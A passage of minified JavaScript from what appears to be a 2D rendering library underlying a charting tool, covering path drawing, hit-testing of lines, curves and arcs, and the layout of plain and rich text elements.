O=p[x++],R=p[x++],N=p[x++],B=p[x++],z=p[x++],E=p[x++],V=p[x++],F=!p[x++],H=N>B?N:B,G=ll(N-B)>.001,W=z+E,U=!1;if(v)y+(j=l[m++])>u&&(W=z+E*(u-y)/j,U=!0),y+=j;if(G&&t.ellipse?t.ellipse(O,R,N,B,V,z,W,F):t.arc(O,R,H,z,W,F),U)break t;w&&(n=al(z)*N+O,i=sl(z)*B+R),r=al(W)*N+O,o=sl(W)*B+R;break;case $s.R:n=r=p[x],i=o=p[x+1],a=p[x++],s=p[x++];var Z=p[x++],Y=p[x++];if(v){if(y+(j=l[m++])>u){var X=u-y;t.moveTo(a,s),t.lineTo(a+rl(X,Z),s),(X-=Z)>0&&t.lineTo(a+Z,s+rl(X,Y)),(X-=Y)>0&&t.lineTo(a+ol(Z-X,0),s+Y),(X-=Z)>0&&t.lineTo(a,s+ol(Y-X,0));break t}y+=j}t.rect(a,s,Z,Y);break;case $s.Z:if(v){var j;if(y+(j=l[m++])>u){T=(u-y)/j;t.lineTo(r*(1-T)+n*T,o*(1-T)+i*T);break t}y+=j}t.closePath(),r=n,o=i}}},t.prototype.clone=function(){var e=new t,n=this.data;return e.data=n.slice?n.slice():Array.prototype.slice.call(n),e._len=this._len,e},t.prototype.canSave=function(){return!!this._saveData},t.CMD=$s,t.initDefaultProps=((e=t.prototype)._saveData=!0,e._ux=0,e._uy=0,e._pendingPtDist=0,void(e._version=0)),t}();function vl(t,e,n,i,r,o,a){if(0===r)return!1;var s=r,l=0;if(a>e+s&&a>i+s||a<e-s&&a<i-s||o>t+s&&o>n+s||o<t-s&&o<n-s)return!1;if(t===n)return Math.abs(o-t)<=s/2;var u=(l=(e-i)/(t-n))*o-a+(t*i-n*e)/(t-n);return u*u/(l*l+1)<=s/2*s/2}function yl(t,e,n,i,r,o,a,s,l,u,c){if(0===l)return!1;var h=l;if(c>e+h&&c>i+h&&c>o+h&&c>s+h||c<e-h&&c<i-h&&c<o-h&&c<s-h||u>t+h&&u>n+h&&u>r+h&&u>a+h||u<t-h&&u<n-h&&u<r-h&&u<a-h)return!1;var p=function(t,e,n,i,r,o,a,s,l,u,c){var h,p,d,f,g,v=.005,y=1/0;Pn[0]=l,Pn[1]=u;for(var m=0;m<1;m+=.05)Ln[0]=Bn(t,n,r,a,m),Ln[1]=Bn(e,i,o,s,m),(f=Gt(Pn,Ln))<y&&(h=m,y=f);y=1/0;for(var _=0;_<32&&!(v<In);_++)p=h-v,d=h+v,Ln[0]=Bn(t,n,r,a,p),Ln[1]=Bn(e,i,o,s,p),f=Gt(Ln,Pn),p>=0&&f<y?(h=p,y=f):(On[0]=Bn(t,n,r,a,d),On[1]=Bn(e,i,o,s,d),g=Gt(On,Pn),d<=1&&g<y?(h=d,y=g):v*=.5);return c&&(c[0]=Bn(t,n,r,a,h),c[1]=Bn(e,i,o,s,h)),kn(y)}(t,e,n,i,r,o,a,s,u,c,null);return p<=h/2}function ml(t,e,n,i,r,o,a,s,l){if(0===a)return!1;var u=a;if(l>e+u&&l>i+u&&l>o+u||l<e-u&&l<i-u&&l<o-u||s>t+u&&s>n+u&&s>r+u||s<t-u&&s<n-u&&s<r-u)return!1;var c=function(t,e,n,i,r,o,a,s,l){var u,c=.005,h=1/0;Pn[0]=a,Pn[1]=s;for(var p=0;p<1;p+=.05)Ln[0]=Gn(t,n,r,p),Ln[1]=Gn(e,i,o,p),(v=Gt(Pn,Ln))<h&&(u=p,h=v);h=1/0;for(var d=0;d<32&&!(c<In);d++){var f=u-c,g=u+c;Ln[0]=Gn(t,n,r,f),Ln[1]=Gn(e,i,o,f);var v=Gt(Ln,Pn);if(f>=0&&v<h)u=f,h=v;else{On[0]=Gn(t,n,r,g),On[1]=Gn(e,i,o,g);var y=Gt(On,Pn);g<=1&&y<h?(u=g,h=y):c*=.5}}return l&&(l[0]=Gn(t,n,r,u),l[1]=Gn(e,i,o,u)),kn(h)}(t,e,n,i,r,o,s,l,null);return c<=u/2}var _l=2*Math.PI;function xl(t){return(t%=_l)<0&&(t+=_l),t}var bl=2*Math.PI;function wl(t,e,n,i,r,o,a,s,l){if(0===a)return!1;var u=a;s-=t,l-=e;var c=Math.sqrt(s*s+l*l);if(c-u>n||c+u<n)return!1;if(Math.abs(i-r)%bl<1e-4)return!0;if(o){var h=i;i=xl(r),r=xl(h)}else i=xl(i),r=xl(r);i>r&&(r+=bl);var p=Math.atan2(l,s);return p<0&&(p+=bl),p>=i&&p<=r||p+bl>=i&&p+bl<=r}function Sl(t,e,n,i,r,o){if(o>e&&o>i||o<e&&o<i)return 0;if(i===e)return 0;var a=(o-e)/(i-e),s=i<e?1:-1;1!==a&&0!==a||(s=i<e?.5:-.5);var l=a*(n-t)+t;return l===r?1/0:l>r?s:0}var Ml=gl.CMD,Tl=2*Math.PI;var kl=[-1,-1,-1],Cl=[-1,-1];function Il(){var t=Cl[0];Cl[0]=Cl[1],Cl[1]=t}function Dl(t,e,n,i,r,o,a,s,l,u){if(u>e&&u>i&&u>o&&u>s||u<e&&u<i&&u<o&&u<s)return 0;var c=En(e,i,o,s,u,kl);if(0===c)return 0;for(var h=0,p=-1,d=void 0,f=void 0,g=0;g<c;g++){var v=kl[g],y=0===v||1===v?.5:1;Bn(t,n,r,a,v)<l||(p<0&&(p=Vn(e,i,o,s,Cl),Cl[1]<Cl[0]&&p>1&&Il(),d=Bn(e,i,o,s,Cl[0]),p>1&&(f=Bn(e,i,o,s,Cl[1]))),2===p?v<Cl[0]?h+=d<e?y:-y:v<Cl[1]?h+=f<d?y:-y:h+=s<f?y:-y:v<Cl[0]?h+=d<e?y:-y:h+=s<d?y:-y)}return h}function Al(t,e,n,i,r,o,a,s){if(s>e&&s>i&&s>o||s<e&&s<i&&s<o)return 0;var l=function(t,e,n,i,r){var o=t-2*e+n,a=2*(e-t),s=t-i,l=0;if(Rn(o))Nn(a)&&(c=-s/a)>=0&&c<=1&&(r[l++]=c);else{var u=a*a-4*o*s;if(Rn(u))(c=-a/(2*o))>=0&&c<=1&&(r[l++]=c);else if(u>0){var c,h=kn(u),p=(-a-h)/(2*o);(c=(-a+h)/(2*o))>=0&&c<=1&&(r[l++]=c),p>=0&&p<=1&&(r[l++]=p)}}return l}(e,i,o,s,kl);if(0===l)return 0;var u=Un(e,i,o);if(u>=0&&u<=1){for(var c=0,h=Gn(e,i,o,u),p=0;p<l;p++){var d=0===kl[p]||1===kl[p]?.5:1;Gn(t,n,r,kl[p])<a||(kl[p]<u?c+=h<e?d:-d:c+=o<h?d:-d)}return c}d=0===kl[0]||1===kl[0]?.5:1;return Gn(t,n,r,kl[0])<a?0:o<e?d:-d}function Pl(t,e,n,i,r,o,a,s){if((s-=e)>n||s<-n)return 0;var l=Math.sqrt(n*n-s*s);kl[0]=-l,kl[1]=l;var u=Math.abs(i-r);if(u<1e-4)return 0;if(u>=Tl-1e-4){i=0,r=Tl;var c=o?1:-1;return a>=kl[0]+t&&a<=kl[1]+t?c:0}if(i>r){var h=i;i=r,r=h}i<0&&(i+=Tl,r+=Tl);for(var p=0,d=0;d<2;d++){var f=kl[d];if(f+t>a){var g=Math.atan2(s,f);c=o?1:-1;g<0&&(g=Tl+g),(g>=i&&g<=r||g+Tl>=i&&g+Tl<=r)&&(g>Math.PI/2&&g<1.5*Math.PI&&(c=-c),p+=c)}}return p}function Ll(t,e,n,i,r){for(var o,a,s,l,u=t.data,c=t.len(),h=0,p=0,d=0,f=0,g=0,v=0;v<c;){var y=u[v++],m=1===v;switch(y===Ml.M&&v>1&&(n||(h+=Sl(p,d,f,g,i,r))),m&&(f=p=u[v],g=d=u[v+1]),y){case Ml.M:p=f=u[v++],d=g=u[v++];break;case Ml.L:if(n){if(vl(p,d,u[v],u[v+1],e,i,r))return!0}else h+=Sl(p,d,u[v],u[v+1],i,r)||0;p=u[v++],d=u[v++];break;case Ml.C:if(n){if(yl(p,d,u[v++],u[v++],u[v++],u[v++],u[v],u[v+1],e,i,r))return!0}else h+=Dl(p,d,u[v++],u[v++],u[v++],u[v++],u[v],u[v+1],i,r)||0;p=u[v++],d=u[v++];break;case Ml.Q:if(n){if(ml(p,d,u[v++],u[v++],u[v],u[v+1],e,i,r))return!0}else h+=Al(p,d,u[v++],u[v++],u[v],u[v+1],i,r)||0;p=u[v++],d=u[v++];break;case Ml.A:var _=u[v++],x=u[v++],b=u[v++],w=u[v++],S=u[v++],M=u[v++];v+=1;var T=!!(1-u[v++]);o=Math.cos(S)*b+_,a=Math.sin(S)*w+x,m?(f=o,g=a):h+=Sl(p,d,o,a,i,r);var k=(i-_)*w/b+_;if(n){if(wl(_,x,w,S,S+M,T,e,k,r))return!0}else h+=Pl(_,x,w,S,S+M,T,k,r);p=Math.cos(S+M)*b+_,d=Math.sin(S+M)*w+x;break;case Ml.R:if(f=p=u[v++],g=d=u[v++],o=f+u[v++],a=g+u[v++],n){if(vl(f,g,o,g,e,i,r)||vl(o,g,o,a,e,i,r)||vl(o,a,f,a,e,i,r)||vl(f,a,f,g,e,i,r))return!0}else h+=Sl(o,g,o,a,i,r),h+=Sl(f,a,f,g,i,r);break;case Ml.Z:if(n){if(vl(p,d,f,g,e,i,r))return!0}else h+=Sl(p,d,f,g,i,r);p=f,d=g}}return n||(s=d,l=g,Math.abs(s-l)<1e-4)||(h+=Sl(p,d,f,g,i,r)||0),0!==h}var Ol=L({fill:"#000",stroke:null,strokePercent:1,fillOpacity:1,strokeOpacity:1,lineDashOffset:0,lineWidth:1,lineCap:"butt",miterLimit:10,strokeNoScale:!1,strokeFirst:!1},As),Rl={style:L({fill:!0,stroke:!0,strokePercent:!0,fillOpacity:!0,strokeOpacity:!0,lineDashOffset:!0,lineWidth:!0,miterLimit:!0},Ps.style)},Nl=zr.concat(["invisible","culling","z","z2","zlevel","parent"]),Bl=function(t){function e(e){return t.call(this,e)||this}var i;return n(e,t),e.prototype.update=function(){var n=this;t.prototype.update.call(this);var i=this.style;if(i.decal){var r=this._decalEl=this._decalEl||new e;r.buildPath===e.prototype.buildPath&&(r.buildPath=function(t){n.buildPath(t,n.shape)}),r.silent=!0;var o=r.style;for(var a in i)o[a]!==i[a]&&(o[a]=i[a]);o.fill=i.fill?i.decal:null,o.decal=null,o.shadowColor=null,i.strokeFirst&&(o.stroke=null);for(var s=0;s<Nl.length;++s)r[Nl[s]]=this[Nl[s]];r.__dirty|=1}else this._decalEl&&(this._decalEl=null)},e.prototype.getDecalElement=function(){return this._decalEl},e.prototype._init=function(e){var n=W(e);this.shape=this.getDefaultShape();var i=this.getDefaultStyle();i&&this.useStyle(i);for(var r=0;r<n.length;r++){var o=n[r],a=e[o];"style"===o?this.style?A(this.style,a):this.useStyle(a):"shape"===o?A(this.shape,a):t.prototype.attrKV.call(this,o,a)}this.style||this.useStyle({})},e.prototype.getDefaultStyle=function(){return null},e.prototype.getDefaultShape=function(){return{}},e.prototype.canBeInsideText=function(){return this.hasFill()},e.prototype.getInsideTextFill=function(){var t=this.style.fill;if("none"!==t){if(j(t)){var e=bi(t,0);return e>.5?Mr:e>.2?"#eee":Tr}if(t)return Tr}return Mr},e.prototype.getInsideTextStroke=function(t){var e=this.style.fill;if(j(e)){var n=this.__zr;if(!(!n||!n.isDarkMode())===bi(t,0)<.4)return e}},e.prototype.buildPath=function(t,e,n){},e.prototype.pathUpdated=function(){this.__dirty&=-5},e.prototype.getUpdatedPathProxy=function(t){return!this.path&&this.createPathProxy(),this.path.beginPath(),this.buildPath(this.path,this.shape,t),this.path},e.prototype.createPathProxy=function(){this.path=new gl(!1)},e.prototype.hasStroke=function(){var t=this.style,e=t.stroke;return!(null==e||"none"===e||!(t.lineWidth>0))},e.prototype.hasFill=function(){var t=this.style.fill;return null!=t&&"none"!==t},e.prototype.getBoundingRect=function(){var t=this._rect,e=this.style,n=!t;if(n){var i=!1;this.path||(i=!0,this.createPathProxy());var r=this.path;(i||4&this.__dirty)&&(r.beginPath(),this.buildPath(r,this.shape,!1),this.pathUpdated()),t=r.getBoundingRect()}if(this._rect=t,this.hasStroke()&&this.path&&this.path.len()>0){var o=this._rectStroke||(this._rectStroke=t.clone());if(this.__dirty||n){o.copy(t);var a=e.strokeNoScale?this.getLineScale():1,s=e.lineWidth;if(!this.hasFill()){var l=this.strokeContainThreshold;s=Math.max(s,null==l?4:l)}a>1e-10&&(o.width+=s/a,o.height+=s/a,o.x-=s/a/2,o.y-=s/a/2)}return o}return t},e.prototype.contain=function(t,e){var n=this.transformCoordToLocal(t,e),i=this.getBoundingRect(),r=this.style;if(t=n[0],e=n[1],i.contain(t,e)){var o=this.path;if(this.hasStroke()){var a=r.lineWidth,s=r.strokeNoScale?this.getLineScale():1;if(s>1e-10&&(this.hasFill()||(a=Math.max(a,this.strokeContainThreshold)),function(t,e,n,i){return Ll(t,e,!0,n,i)}(o,a/s,t,e)))return!0}if(this.hasFill())return function(t,e,n){return Ll(t,0,!1,e,n)}(o,t,e)}return!1},e.prototype.dirtyShape=function(){this.__dirty|=4,this._rect&&(this._rect=null),this._decalEl&&this._decalEl.dirtyShape(),this.markRedraw()},e.prototype.dirty=function(){this.dirtyStyle(),this.dirtyShape()},e.prototype.animateShape=function(t){return this.animate("shape",t)},e.prototype.updateDuringAnimation=function(t){"style"===t?this.dirtyStyle():"shape"===t?this.dirtyShape():this.markRedraw()},e.prototype.attrKV=function(e,n){"shape"===e?this.setShape(n):t.prototype.attrKV.call(this,e,n)},e.prototype.setShape=function(t,e){var n=this.shape;return n||(n=this.shape={}),"string"==typeof t?n[t]=e:A(n,t),this.dirtyShape(),this},e.prototype.shapeChanged=function(){return!!(4&this.__dirty)},e.prototype.createStyle=function(t){return xt(Ol,t)},e.prototype._innerSaveToNormal=function(e){t.prototype._innerSaveToNormal.call(this,e);var n=this._normalState;e.shape&&!n.shape&&(n.shape=A({},this.shape))},e.prototype._applyStateObj=function(e,n,i,r,o,a){if(t.prototype._applyStateObj.call(this,e,n,i,r,o,a),1!==this.__inHover){var s,l=!(n&&r);if(n&&n.shape?o?r?s=n.shape:(s=A({},i.shape),A(s,n.shape)):(s=A({},r?this.shape:i.shape),A(s,n.shape)):l&&(s=i.shape),s)if(o){this.shape=A({},this.shape);for(var u={},c=W(s),h=0;h<c.length;h++){var p=c[h];"object"==typeof s[p]?this.shape[p]=s[p]:u[p]=s[p]}this._transitionState(e,{shape:u},a)}else this.shape=s,this.dirtyShape()}},e.prototype._mergeStates=function(e){for(var n,i=t.prototype._mergeStates.call(this,e),r=0;r<e.length;r++){var o=e[r];o.shape&&(n=n||{},this._mergeStyle(n,o.shape))}return n&&(i.shape=n),i},e.prototype.getAnimationStyleProps=function(){return Rl},e.prototype.isZeroArea=function(){return!1},e.extend=function(t){var i=function(e){function i(n){var i=e.call(this,n)||this;return t.init&&t.init.call(i,n),i}return n(i,e),i.prototype.getDefaultStyle=function(){return C(t.style)},i.prototype.getDefaultShape=function(){return C(t.shape)},i}(e);for(var r in t)"function"==typeof t[r]&&(i.prototype[r]=t[r]);return i},e.initDefaultProps=((i=e.prototype).type="path",i.strokeContainThreshold=5,i.segmentIgnoreThreshold=0,i.subPixelOptimize=!1,i.autoBatch=!1,void(i.__dirty=7)),e}(Rs),zl=L({strokeFirst:!0,font:a,x:0,y:0,textAlign:"left",textBaseline:"top",miterLimit:2},Ol),El=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.hasStroke=function(){return Is(this.style)},e.prototype.hasFill=function(){var t=this.style.fill;return null!=t&&"none"!==t},e.prototype.createStyle=function(t){return xt(zl,t)},e.prototype.setBoundingRect=function(t){this._rect=t},e.prototype.getBoundingRect=function(){var t,e,n;return this._rect||(this._rect=(t=this.style,e=ks(t.text),n=t.font,Cs(t,Wr(Vr(n),e),jr(n),null))),this._rect},e.initDefaultProps=void(e.prototype.dirtyRectTolerance=10),e}(Rs);El.prototype.type="tspan";var Vl=L({x:0,y:0},As),Fl={style:L({x:!0,y:!0,width:!0,height:!0,sx:!0,sy:!0,sWidth:!0,sHeight:!0},Ps.style)};var Hl=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.createStyle=function(t){return xt(Vl,t)},e.prototype._getSize=function(t){var e=this.style,n=e[t];if(null!=n)return n;var i,r=(i=e.image)&&"string"!=typeof i&&i.width&&i.height?e.image:this.__image;if(!r)return 0;var o="width"===t?"height":"width",a=e[o];return null==a?r[t]:r[t]/r[o]*a},e.prototype.getWidth=function(){return this._getSize("width")},e.prototype.getHeight=function(){return this._getSize("height")},e.prototype.getAnimationStyleProps=function(){return Fl},e.prototype.getBoundingRect=function(){var t=this.style;return this._rect||(this._rect=new Ue(t.x||0,t.y||0,this.getWidth(),this.getHeight())),this._rect},e}(Rs);Hl.prototype.type="image";var Gl=Math.round;function Wl(t,e,n){if(e){var i=e.x1,r=e.x2,o=e.y1,a=e.y2;t.x1=i,t.x2=r,t.y1=o,t.y2=a;var s=n&&n.lineWidth;return s?(Gl(2*i)===Gl(2*r)&&(t.x1=t.x2=Zl(i,s,!0)),Gl(2*o)===Gl(2*a)&&(t.y1=t.y2=Zl(o,s,!0)),t):t}}function Ul(t,e,n){if(e){var i=e.x,r=e.y,o=e.width,a=e.height;t.x=i,t.y=r,t.width=o,t.height=a;var s=n&&n.lineWidth;return s?(t.x=Zl(i,s,!0),t.y=Zl(r,s,!0),t.width=Math.max(Zl(i+o,s,!1)-t.x,0===o?0:1),t.height=Math.max(Zl(r+a,s,!1)-t.y,0===a?0:1),t):t}}function Zl(t,e,n){if(!e)return t;var i=Gl(2*t);return(i+Gl(e))%2==0?i/2:(i+(n?1:-1))/2}var Yl=function(){this.x=0,this.y=0,this.width=0,this.height=0},Xl={},jl=function(t){function e(e){return t.call(this,e)||this}return n(e,t),e.prototype.getDefaultShape=function(){return new Yl},e.prototype.buildPath=function(t,e){var n,i,r,o;if(this.subPixelOptimize){var a=Ul(Xl,e,this.style);n=a.x,i=a.y,r=a.width,o=a.height,a.r=e.r,e=a}else n=e.x,i=e.y,r=e.width,o=e.height;e.r?function(t,e){var n,i,r,o,a,s=e.x,l=e.y,u=e.width,c=e.height,h=e.r;u<0&&(s+=u,u=-u),c<0&&(l+=c,c=-c),"number"==typeof h?n=i=r=o=h:h instanceof Array?1===h.length?n=i=r=o=h[0]:2===h.length?(n=r=h[0],i=o=h[1]):3===h.length?(n=h[0],i=o=h[1],r=h[2]):(n=h[0],i=h[1],r=h[2],o=h[3]):n=i=r=o=0,n+i>u&&(n*=u/(a=n+i),i*=u/a),r+o>u&&(r*=u/(a=r+o),o*=u/a),i+r>c&&(i*=c/(a=i+r),r*=c/a),n+o>c&&(n*=c/(a=n+o),o*=c/a),t.moveTo(s+n,l),t.lineTo(s+u-i,l),0!==i&&t.arc(s+u-i,l+i,i,-Math.PI/2,0),t.lineTo(s+u,l+c-r),0!==r&&t.arc(s+u-r,l+c-r,r,0,Math.PI/2),t.lineTo(s+o,l+c),0!==o&&t.arc(s+o,l+c-o,o,Math.PI/2,Math.PI),t.lineTo(s,l+n),0!==n&&t.arc(s+n,l+n,n,Math.PI,1.5*Math.PI),t.closePath()}(t,e):t.rect(n,i,r,o)},e.prototype.isZeroArea=function(){return!this.shape.width||!this.shape.height},e}(Bl);jl.prototype.type="rect";var ql={fill:"#000"},Kl={},$l={style:L({fill:!0,stroke:!0,fillOpacity:!0,strokeOpacity:!0,lineWidth:!0,fontSize:!0,lineHeight:!0,width:!0,height:!0,textShadowColor:!0,textShadowBlur:!0,textShadowOffsetX:!0,textShadowOffsetY:!0,backgroundColor:!0,padding:!0,borderColor:!0,borderWidth:!0,borderRadius:!0},Ps.style)},Ql=function(t){function e(e){var n=t.call(this)||this;return n.type="text",n._children=[],n._defaultStyle=ql,n.attr(e),n}return n(e,t),e.prototype.childrenRef=function(){return this._children},e.prototype.update=function(){t.prototype.update.call(this),this.styleChanged()&&this._updateSubTexts();for(var e=0;e<this._children.length;e++){var n=this._children[e];n.zlevel=this.zlevel,n.z=this.z,n.z2=this.z2,n.culling=this.culling,n.cursor=this.cursor,n.invisible=this.invisible}},e.prototype.updateTransform=function(){var e=this.innerTransformable;e?(e.updateTransform(),e.transform&&(this.transform=e.transform)):t.prototype.updateTransform.call(this)},e.prototype.getLocalTransform=function(e){var n=this.innerTransformable;return n?n.getLocalTransform(e):t.prototype.getLocalTransform.call(this,e)},e.prototype.getComputedTransform=function(){return this.__hostTarget&&(this.__hostTarget.getComputedTransform(),this.__hostTarget.updateInnerText(!0)),t.prototype.getComputedTransform.call(this)},e.prototype._updateSubTexts=function(){var t;this._childCursor=0,ou(t=this.style),E(t.rich,ou),this.style.rich?this._updateRichTexts():this._updatePlainTexts(),this._children.length=this._childCursor,this.styleUpdated()},e.prototype.addSelfToZr=function(e){t.prototype.addSelfToZr.call(this,e);for(var n=0;n<this._children.length;n++)this._children[n].__zr=e},e.prototype.removeSelfFromZr=function(e){t.prototype.removeSelfFromZr.call(this,e);for(var n=0;n<this._children.length;n++)this._children[n].__zr=null},e.prototype.getBoundingRect=function(){if(this.styleChanged()&&this._updateSubTexts(),!this._rect){for(var t=new Ue(0,0,0,0),e=this._children,n=[],i=null,r=0;r<e.length;r++){var o=e[r],a=o.getBoundingRect(),s=o.getLocalTransform(n);s?(t.copy(a),t.applyTransform(s),(i=i||t.clone()).union(t)):(i=i||a.clone()).union(a)}this._rect=i||t}return this._rect},e.prototype.setDefaultTextStyle=function(t){this._defaultStyle=t||ql},e.prototype.setTextContent=function(t){0},e.prototype._mergeStyle=function(t,e){if(!e)return t;var n=e.rich,i=t.rich||n&&{};return A(t,e),n&&i?(this._mergeRich(i,n),t.rich=i):i&&(t.rich=i),t},e.prototype._mergeRich=function(t,e){for(var n=W(e),i=0;i<n.length;i++){var r=n[i];t[r]=t[r]||{},A(t[r],e[r])}},e.prototype.getAnimationStyleProps=function(){return $l},e.prototype._getOrCreateChild=function(t){var e=this._children[this._childCursor];return e&&e instanceof t||(e=new t),this._children[this._childCursor++]=e,e.__zr=this.__zr,e.parent=this,e},e.prototype._updatePlainTexts=function(){var t=this.style,e=t.font||a,n=t.padding,i=this._defaultStyle,r=t.x||0,o=t.y||0,s=t.align||i.align||"left",l=t.verticalAlign||i.verticalAlign||"top";Ss(Kl,i.overflowRect,r,o,s,l),r=Kl.baseX,o=Kl.baseY;var u=function(t,e,n,i){var r=ks(t),o=e.overflow,a=e.padding,s=a?a[1]+a[3]:0,l=a?a[0]+a[2]:0,u=e.font,c="truncate"===o,h=jr(u),p=at(e.lineHeight,h),d="truncate"===e.lineOverflow,f=!1,g=e.width;null==g&&null!=n&&(g=n-s);var v,y=e.height;null==y&&null!=i&&(y=i-l);var m=(v=null==g||"break"!==o&&"breakAll"!==o?r?r.split("\n"):[]:r?ws(r,e.font,g,"breakAll"===o,0).lines:[]).length*p;if(null==y&&(y=m),m>y&&d){var _=Math.floor(y/p);f=f||v.length>_,m=(v=v.slice(0,_)).length*p}if(r&&c&&null!=g)for(var x=ds(g,u,e.ellipsis,{minChar:e.truncateMinChar,placeholder:e.placeholder}),b={},w=0;w<v.length;w++)fs(b,v[w],x),v[w]=b.textLine,f=f||b.isTruncated;var S=y,M=0,T=Vr(u);for(w=0;w<v.length;w++)M=Math.max(Wr(T,v[w]),M);null==g&&(g=M);var k=g;return{lines:v,height:y,outerWidth:k+=s,outerHeight:S+=l,lineHeight:p,calculatedLineHeight:h,contentWidth:M,contentHeight:m,width:g,isTruncated:f}}(uu(t),t,Kl.outerWidth,Kl.outerHeight),c=cu(t),h=!!t.backgroundColor,p=u.outerHeight,d=u.outerWidth,f=u.lines,g=u.lineHeight;this.isTruncated=!!u.isTruncated;var v=r,y=Xr(o,u.contentHeight,l);if(c||n){var m=Yr(r,d,s),_=Xr(o,p,l);c&&this._renderBackground(t,t,m,_,d,p)}y+=g/2,n&&(v=lu(r,s,n),"top"===l?y+=n[0]:"bottom"===l&&(y-=n[2]));for(var x=0,b=!1,w=!1,S=(su("fill"in t?t.fill:(w=!0,i.fill))),M=(au("stroke"in t?t.stroke:h||i.autoStroke&&!w?null:(x=2,b=!0,i.stroke))),T=t.textShadowBlur>0,k=0;k<f.length;k++){var C=this._getOrCreateChild(El),I=C.createStyle();C.useStyle(I),I.text=f[k],I.x=v,I.y=y,s&&(I.textAlign=s),I.textBaseline="middle",I.opacity=t.opacity,I.strokeFirst=!0,T&&(I.shadowBlur=t.textShadowBlur||0,I.shadowColor=t.textShadowColor||"transparent",I.shadowOffsetX=t.textShadowOffsetX||0,I.shadowOffsetY=t.textShadowOffsetY||0),I.stroke=M,I.fill=S,M&&(I.lineWidth=t.lineWidth||x,I.lineDash=t.lineDash,I.lineDashOffset=t.lineDashOffset||0),I.font=e,iu(I,t),y+=g,C.setBoundingRect(Cs(I,u.contentWidth,u.calculatedLineHeight,b?0:null))}},e.prototype._updateRichTexts=function(){var t=this.style,e=this._defaultStyle,n=t.align||e.align,i=t.verticalAlign||e.verticalAlign,r=t.x||0,o=t.y||0;Ss(Kl,e.overflowRect,r,o,n,i),r=Kl.baseX,o=Kl.baseY;var a=function(t,e,n,i,r){var o=new ms,a=ks(t);if(!a)return o;var s=e.padding,l=s?s[1]+s[3]:0,u=s?s[0]+s[2]:0,c=e.width;null==c&&null!=n&&(c=n-l);var h=e.height;null==h&&null!=i&&(h=i-u);for(var p,d=e.overflow,f="break"!==d&&"breakAll"!==d||null==c?null:{width:c,accumWidth:0,breakAll:"breakAll"===d},g=hs.lastIndex=0;null!=(p=hs.exec(a));){var v=p.index;v>g&&_s(o,a.substring(g,v),e,f),_s(o,p[2],e,f,p[1]),g=hs.lastIndex}g<a.length&&_s(o,a.substring(g,a.length),e,f);var y=[],m=0,_=0,x="truncate"===d,b="truncate"===e.lineOverflow,w={};function S(t,e,n){t.width=e,t.lineHeight=n,m+=n,_=Math.max(_,e)}t:for(var M=0;M<o.lines.length;M++){for(var T=o.lines[M],k=0,C=0,I=0;I<T.tokens.length;I++){var D=(F=T.tokens[I]).styleName&&e.rich[F.styleName]||{},A=F.textPadding=D.padding,P=A?A[1]+A[3]:0,L=F.font=D.font||e.font;F.contentHeight=jr(L);var O=at(D.height,F.contentHeight);if(F.innerHeight=O,A&&(O+=A[0]+A[2]),F.height=O,F.lineHeight=st(D.lineHeight,e.lineHeight,O),F.align=D&&D.align||r,F.verticalAlign=D&&D.verticalAlign||"middle",b&&null!=h&&m+F.lineHeight>h){var R=o.lines.length;I>0?(T.tokens=T.tokens.slice(0,I),S(T,C,k),o.lines=o.lines.slice(0,M+1)):o.lines=o.lines.slice(0,M),o.isTruncated=o.isTruncated||o.lines.length<R;break t}var N=D.width,B=null==N||"auto"===N;if("string"==typeof N&&"%"===N.charAt(N.length-1))F.percentWidth=N,y.push(F),F.contentWidth=Wr(Vr(L),F.text);else{if(B){var z=D.backgroundColor,E=z&&z.image;E&&cs(E=ss(E))&&(F.width=Math.max(F.width,E.width*O/E.height))}var V=x&&null!=c?c-C:null;null!=V&&V<F.width?!B||V<P?(F.text="",F.width=F.contentWidth=0):(ps(w,F.text,V-P,L,e.ellipsis,{minChar:e.truncateMinChar}),F.text=w.text,o.isTruncated=o.isTruncated||w.isTruncated,F.width=F.contentWidth=Wr(Vr(L),F.text)):F.contentWidth=Wr(Vr(L),F.text)}F.width+=P,C+=F.width,D&&(k=Math.max(k,F.lineHeight))}S(T,C,k)}for(o.outerWidth=o.width=at(c,_),o.outerHeight=o.height=at(h,m),o.contentHeight=m,o.contentWidth=_,o.outerWidth+=l,o.outerHeight+=u,M=0;M<y.length;M++){var F,H=(F=y[M]).percentWidth;F.width=parseInt(H,10)/100*o.width}return o}(uu(t),t,Kl.outerWidth,Kl.outerHeight,n),s=a.width,l=a.outerWidth,u=a.outerHeight,c=t.padding;this.isTruncated=!!a.isTruncated;var h=Yr(r,l,n),p=Xr(o,u,i),d=h,f=p;c&&(d+=c[3],f+=c[0]);var g=d+s;cu(t)&&this._renderBackground(t,t,h,p,l,u);for(var v=!!t.backgroundColor,y=0;y<a.lines.length;y++){for(var m=a.lines[y],_=m.tokens,x=_.length,b=m.lineHeight,w=m.width,S=0,M=d,T=g,k=x-1,C=void 0;S<x&&(!(C=_[S]).align||"left"===C.align);)this._placeToken(C,t,b,f,M,"left",v),w-=C.width,M+=C.width,S++;for(;k>=0&&"right"===(C=_[k]).align;)this._placeToken(C,t,b,f,T,"right",v),w-=C.width,T-=C.width,k--;for(M+=(s-(M-d)-(g-T)-w)/2;S<=k;)C=_[S],this._placeToken(C,t,b,f,M+C.width/2,"center",v),M+=C.width,S++;f+=b}},e.prototype._placeToken=function(t,e,n,i,r,o,s){var l=e.rich[t.styleName]||{};l.text=t.text;var u=t.verticalAlign,c=i+n/2;"top"===u?c=i+t.height/2:"bottom"===u&&(c=i+n-t.height/2),!t.isLineHolder&&cu(l)&&this._renderBackground(l,e,"right"===o?r-t.width:"center"===o?r-t.width/2:r,c-t.height/2,t.width,t.height);var h=!!l.backgroundColor,p=t.textPadding;p&&(r=lu(r,o,p),c-=t.height/2-p[0]-t.innerHeight/2);var d=this._getOrCreateChild(El),f=d.createStyle();d.useStyle(f);var g=this._defaultStyle,v=!1,y=0,m=!1,_=su("fill"in l?l.fill:"fill"in e?e.fill:(v=!0,g.fill)),x=au("stroke"in l?l.stroke:"stroke"in 